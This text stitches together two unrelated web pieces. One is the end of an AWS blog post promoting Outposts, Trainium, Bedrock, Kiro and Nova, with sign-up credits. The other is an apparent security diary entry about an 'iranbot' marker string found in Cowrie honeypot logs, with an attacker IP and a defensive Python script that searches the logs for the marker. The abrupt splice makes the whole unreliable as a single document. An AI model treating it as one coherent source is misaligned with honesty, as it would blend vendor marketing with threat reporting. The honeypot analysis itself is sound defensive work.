- Run AWS Cloud in your data center (2019) – AWS Outposts is a family of fully managed services delivering AWS infrastructure and services to virtually any on-premises or edge location for a truly consistent hybrid experience. Now, AWS Outposts is available in a variety of form factors, from 1U and 2U Outposts servers to 42U Outposts racks and multiple-rack deployments. Customers such as DISH, FanDuel, Morningstar, Philips, and others use Outposts for workloads requiring low-latency access to on-premises systems, local data processing, data residency, and application migration with local system interdependencies.
- Best price performance for ML workloads (2019) – We launched Amazon EC2 Inf1 instances powered by the first generation of AWS Inferentia chips designed to provide fast, low-latency inferencing. In 2022, we launched Amazon EC2 Trn1 instances powered by the first generation of AWS Trainium chips optimized for high performance AI training. Last year, we launched Amazon EC2 Trn3 UltraServers powered by Trainium3 to deliver the best token economics for next-generation generative AI applications. Customers such as Anthropic, Decart, poolside, Databricks, Ricoh, Karakuri, SplashMusic, and others are realizing performance and cost benefits of Trainium-based instances and UltraServers.
- Build your generative AI apps on AWS (2023) – Amazon Bedrock is a fully managed service that offers a choice of industry leading AI models along with a broad set of capabilities that you need to build generative AI applications, simplifying development with security, privacy, and responsible AI. Last year, we introduced Amazon Bedrock AgentCore, an agentic platform for building, deploying, and operating effective agents securely at scale. Now, more than 100,000 customers worldwide choose Amazon Bedrock to deliver personalized experiences, automate complex workflows, and uncover actionable insights.
- Your AI coding companion (2023) – We launched Amazon CodeWhisperer as the industry’s first cloud-based AI coding assistant service. The service delivered code generation from comments, open-source code reference tracking, and vulnerability scanning capabilities. In 2024, we rebranded the service to Amazon Q Developer and expanded its features to include a chat-based assistant in the console, project-based code generation, and code transformation tools. In 2025, this service evolved into Kiro, a new agentic AI development tool that brings structure to AI coding through spec-driven development, taking projects from prototype to production. Recently, Kiro previewed a frontier autonomous agent that works independently on development tasks, maintaining context and learning from every interaction.
- Broaden your AI model choices (2024) – We launched Amazon Titan models, further increasing cost-effective AI model choice for text and multimodal needs in Amazon Bedrock. At AWS re:Invent 2024, we announced Amazon Nova models, which deliver frontier intelligence and industry-leading price performance. Now Amazon Nova has a portfolio of AI offerings, including Amazon Nova models; Amazon Nova Forge, a new service to build your own frontier models; and Amazon Nova Act, a new service to build agents that automate browser-based UI workflows, powered by a custom Amazon Nova 2 Lite model.
Build with AI: Your path forward
A decade ago, AWS responded to the emergence of deep learning by launching the broadest and deepest ML services, such as Amazon SageMaker, democratizing AI for a wide range of customers—from individual developers and startups to large enterprises—regardless of their technical expertise.
AI technology has advanced significantly, but building and deploying AI models and applications still remains complex for many developers and organizations. AWS offers the broadest selection of AI models through Amazon Bedrock, including models from leading providers such as Anthropic and OpenAI. By making our model training and inference infrastructure and responsible AI both practical and scalable, we help you accelerate trusted AI innovation while maintaining control of your data and costs—all built on our global infrastructure’s operational excellence.
Reinvent your idea, keep on learning, build confidently with AI you can trust, and share your successes with us! New AWS customers receive up to $200 in credits to try AWS AI for free. If you’re a student, start building with Kiro for free using 1,000 credits per month for one year.
— Channy
Interesting Message Stored in Cowrie Logs, (Wed, Mar 18th)
This activity was found and reported by BACS student Adam Thorman as part of one of his assignments; I posted his final paper [1] last week. The activity appears to have occurred only on 19 Feb 2026, when at least two DShield sensors recorded in their cowrie logs, on the same day, an echo command that included: "MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here". My DShield sensor captured activity from source IP 64.89.161.198 between 30 Jan and 22 Feb 2026 that included port scans, a successful login via Telnet (TCP/23), and web access; all of that activity, captured by the DShield sensor (cowrie, webhoneypot & iptables logs), is listed below.
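If you run your own Cowrie honeypot, you can hunt for this marker string directly in Cowrie's JSON log output. A minimal sketch, assuming Cowrie's standard JSON event fields (`eventid`, `input`, `src_ip`, `timestamp`); the function name and the sample data are my own, not from the diary:

```python
import json

# Marker string observed in the echo command (per the diary entry above).
PAYLOAD_MARKER = "MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY"


def find_marker_events(log_lines):
    """Return (timestamp, src_ip, command) tuples for Cowrie
    command-input events whose command contains the marker."""
    hits = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            # Skip non-JSON lines (e.g., truncated writes).
            continue
        if (event.get("eventid") == "cowrie.command.input"
                and PAYLOAD_MARKER in event.get("input", "")):
            hits.append((event.get("timestamp"),
                         event.get("src_ip"),
                         event["input"]))
    return hits


# Example usage against a cowrie.json file:
# with open("/srv/cowrie/var/log/cowrie/cowrie.json") as f:
#     for ts, ip, cmd in find_marker_events(f):
#         print(ts, ip, cmd)
```

In practice you would run this over each rotated `cowrie.json.*` file as well, since the activity window spans several weeks.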